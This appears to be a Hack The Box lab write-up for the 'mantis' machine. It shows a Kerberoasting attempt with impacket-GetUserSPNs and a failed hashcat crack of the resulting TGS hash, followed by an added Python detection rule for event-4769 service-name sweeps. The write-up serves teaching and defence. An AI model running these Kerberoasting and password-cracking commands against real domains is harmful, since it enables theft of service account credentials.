impacket-GetUserSPNs
┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ impacket-GetUserSPNs htb.local/james@$IP -target-domain htb.local -dc-ip $IP -usersfile users -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
password:
[-] CCache file is not found. Skipping...
[-] principal: james - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] principal: administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*mantis$HTB.LOCAL$mantis*$c2e3fc96010a456b84b80987fd37bad4$...
[-] principal: admin - Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Now that I have a valid domain credential, I am able to Kerberoast the mantis user for the TGS ticket hash.
The mantis user is likely the machine account for the target host.
PS C:\hashcat-6.2.6> .\hashcat.exe -a 0 -m 13100 .\hashes .\rockyou.txt -d 2 -O --self-test-disable
hashcat (v6.2.6) starting
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
watchdog: Temperature abort trigger set to 90c
host memory required for this attack: 263 MB
dictionary cache hit:
* filename..: .\rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
Approaching final keyspace - workload adjusted.
session..........: hashcat
status...........: Exhausted
hash.mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
hash.target......: $krb5tgs$23$*mantis$HTB.LOCAL$mantis*$c2e3fc96010a4...222129
time.started.....: Tue Jan 10 18:28:05 2023 (1 sec)
time.estimated...: Tue Jan 10 18:28:06 2023 (0 secs)
kernel.feature...: Optimized Kernel
guess.base.......: File (.\rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#2.........: 18987.8 kH/s (1.99ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
progress.........: 14344385/14344385 (100.00%)
rejected.........: 3094/14344385 (0.02%)
restore.point....: 14344385/14344385 (100.00%)
restore.sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#2....: $HEX[30383433333532373937] -> $HEX[042a0337c2a156616d6f732103]
hardware.mon.#2..: Temp: 57c Util: 30% Core:1800MHz Mem:6000MHz Bus:8
started: Tue Jan 10 18:28:04 2023
stopped: Tue Jan 10 18:28:06 2023
PS C:\Users\tacticalgator\Tools\hashcat-6.2.6>
Hashcat was unable to crack the TGS ticket hash.
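
On the domain controller, the -usersfile sweep shown above appears in the Security log as several event 4769 failures with status 0x7 (KDC_ERR_S_PRINCIPAL_UNKNOWN) next to an issued RC4 (etype 23) service ticket. The following detection logic is an added example, not part of the original notes; the event tuples, the accounts other than james, the service names other than james, administrator and mantis, and the window and threshold values are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17            # etype 23, as in the $krb5tgs$23$ hash
S_PRINCIPAL_UNKNOWN = 0x7  # KDC_ERR_S_PRINCIPAL_UNKNOWN

# Constructed sample data: Security event 4769 records reduced to
# (time, requesting account, service name, ticket etype, status).
# Failed requests carry etype 0xFFFFFFFF.
EVENTS = [
    ("2023-01-10T09:00:00", "alice@HTB.LOCAL", "MANTIS$", 0x12, 0x0),
    ("2023-01-10T09:00:05", "alice@HTB.LOCAL", "fileserv", 0xFFFFFFFF, 0x7),
    ("2023-01-10T10:00:00", "bob@HTB.LOCAL", "legacyapp", 0x17, 0x0),
    ("2023-01-10T11:00:00", "carol@HTB.LOCAL", "oldhost", 0xFFFFFFFF, 0x7),
    ("2023-01-10T12:00:00", "carol@HTB.LOCAL", "printsrv", 0xFFFFFFFF, 0x7),
    ("2023-01-10T12:00:01", "carol@HTB.LOCAL", "legacyapp", 0x17, 0x0),
    ("2023-01-10T18:20:01", "james@HTB.LOCAL", "james", 0xFFFFFFFF, 0x7),
    ("2023-01-10T18:20:01", "james@HTB.LOCAL", "administrator", 0xFFFFFFFF, 0x7),
    ("2023-01-10T18:20:02", "james@HTB.LOCAL", "mantis", 0x17, 0x0),
]

def find_spn_sweeps(events, window=timedelta(minutes=2), min_unknown=2):
    """Flag accounts that, inside one window, asked for several unknown
    service names and were also issued at least one RC4 service ticket."""
    by_account = defaultdict(list)
    for ts, account, service, etype, status in events:
        by_account[account].append((datetime.fromisoformat(ts), service, etype, status))
    findings = {}
    for account, rows in by_account.items():
        rows.sort(key=lambda r: r[0])
        # Slide the window start over every event of this account.
        for i, (start, *_rest) in enumerate(rows):
            burst = [r for r in rows[i:] if r[0] - start <= window]
            unknown = sorted({s for _, s, _, st in burst if st == S_PRINCIPAL_UNKNOWN})
            rc4 = sorted({s for _, s, et, st in burst if st == 0 and et == RC4_HMAC})
            if len(unknown) >= min_unknown and rc4:
                findings[account] = {"unknown": unknown, "rc4": rc4}
                break
    return findings

if __name__ == "__main__":
    for account, hit in find_spn_sweeps(EVENTS).items():
        print(account, "unknown:", hit["unknown"], "RC4 tickets:", hit["rc4"])
```

A single mistyped service name (alice) or one RC4 ticket for a legacy service (bob) does not trigger the rule; only the combination inside one window does.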